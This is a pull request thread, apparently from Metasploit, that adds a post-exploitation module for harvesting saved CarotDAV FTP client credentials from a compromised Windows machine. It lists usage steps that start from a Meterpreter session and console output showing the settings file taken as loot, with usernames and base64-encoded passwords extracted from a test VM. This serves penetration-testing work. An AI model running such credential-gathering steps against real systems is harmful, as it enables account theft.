Add CarotDAV FTP PackRat module

[The-Pink-Panther]

As A part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new /post/windows/gather/credentials module for the CarotDAV FTP Client. https://rei.to/carotdav_en.html

Currently, passwords extracted by the module are still encoded with base64.

This pull request will add two files:

1. modules/post/windows/gather/credentials/carotdav_ftp.rb
2. documentation/modules/post/windows/gather/credentials/carotdav_ftp.md

Verification

1. Start msfconsole
2. Get a Meterpreter session on a Windows system
3. use post/windows/gather/credentials/carotdav_ftp
4. Set SESSION 1
5. run

Scenario

Using CarotDAV FTP v1.16.3 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045

msf6 post(windows/gather/credentials/carotdav_ftp) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Carotdav's Setting file found
[*] Downloading C:\Users\test\AppData\Roaming\Rei Software\CarotDAV\Setting.xml
[*] Carotdav Setting.xml downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508103946_default_10.0.0.2_CarotDAVSetting._341142.xml

[+] <Name>TheTestBed</Name>
[+] <Name>Aperture Testing Laboratories</Name>
[+] <TargetUri>ftp://10.0.0.2/</TargetUri>
[+] <TargetUri>ftp://10.0.0.3/</TargetUri>
[+] <UserName>TestBed\TheTester</UserName>
[+] <UserName>TestBed\TheBackupTester</UserName>
[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
[+] <Password>dABpAGEAcwBwAGIAaQBxAGUAMgByAA==</Password>
[+] File with data saved:  /home/kali/.msf4/loot/20240508103947_default_10.0.0.2_EXTRACTIONSSetti_673514.xml
[*] PackRat credential sweep Completed
[*] Post module execution completed

[bwatters-r7]

@The-Pink-Panther the link for the software appears dead to me? Is that new, or is it a security protection on my end?

[The-Pink-Panther]

@The-Pink-Panther the link for the software appears dead to me? Is that new, or is it a security protection on my end?

I believe it's security protection on your end. I just checked on my test VM, and I can visit the link. The AV on my actual machine blocks the link as well.

[bwatters-r7]

OK; thank you. I'll find a work-around!

[bwatters-r7]

One more question. I was able to get to the website and download the installer. When I install it, I get the following error message:

I've installed the earliest dotnet framework I could find- 2.1 I believe, along with a modern release. I'm still getting this error. What version did you install, and where did you find it?

Also, based on this and some reading, support for this product ended in 2006?

[The-Pink-Panther]

One more question. I was able to get to the website and download the installer. When I install it, I get the following error message:

I've installed the earliest dotnet framework I could find- 2.1 I believe, along with a modern release. I'm still getting this error. What version did you install, and where did you find it?

Also, based on this and some reading, support for this product ended in 2006?

Hmm, that's odd. I downloaded version 1.16.3 from http://rei.to/carotdav_en.html#download.
According to the about information, it uses a version of .NET4.0

[bwatters-r7]

Huh; I went to the site and downloaded the last one on the list. Let me double check.

[bwatters-r7]

msf6 post(windows/gather/credentials/carotdav_ftp) > show options

Module options (post/windows/gather/credentials/carotdav_ftp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, logins)
   EXTRACT_DATA  true             no        Extract data and stores in a separate file
   SESSION       1                yes       The session to run this module on
   STORE_LOOT    true             no        Store artifacts into loot database


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/carotdav_ftp) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Starting Packrat...
[*] Carotdav's base folder found
[*] Found the folder containing specified artifact for Setting.
[-] Carotdav's Setting not found in msfuser's user directory

[-] Skipping Setting since it was not found on the user's folder.
[*] PackRat credential sweep Completed
[*] Post module execution completed
msf6 post(windows/gather/credentials/carotdav_ftp) > 

[bwatters-r7]

Release Notes

This adds a gather module leveraging Packrat targeting CarotDAV FTP client.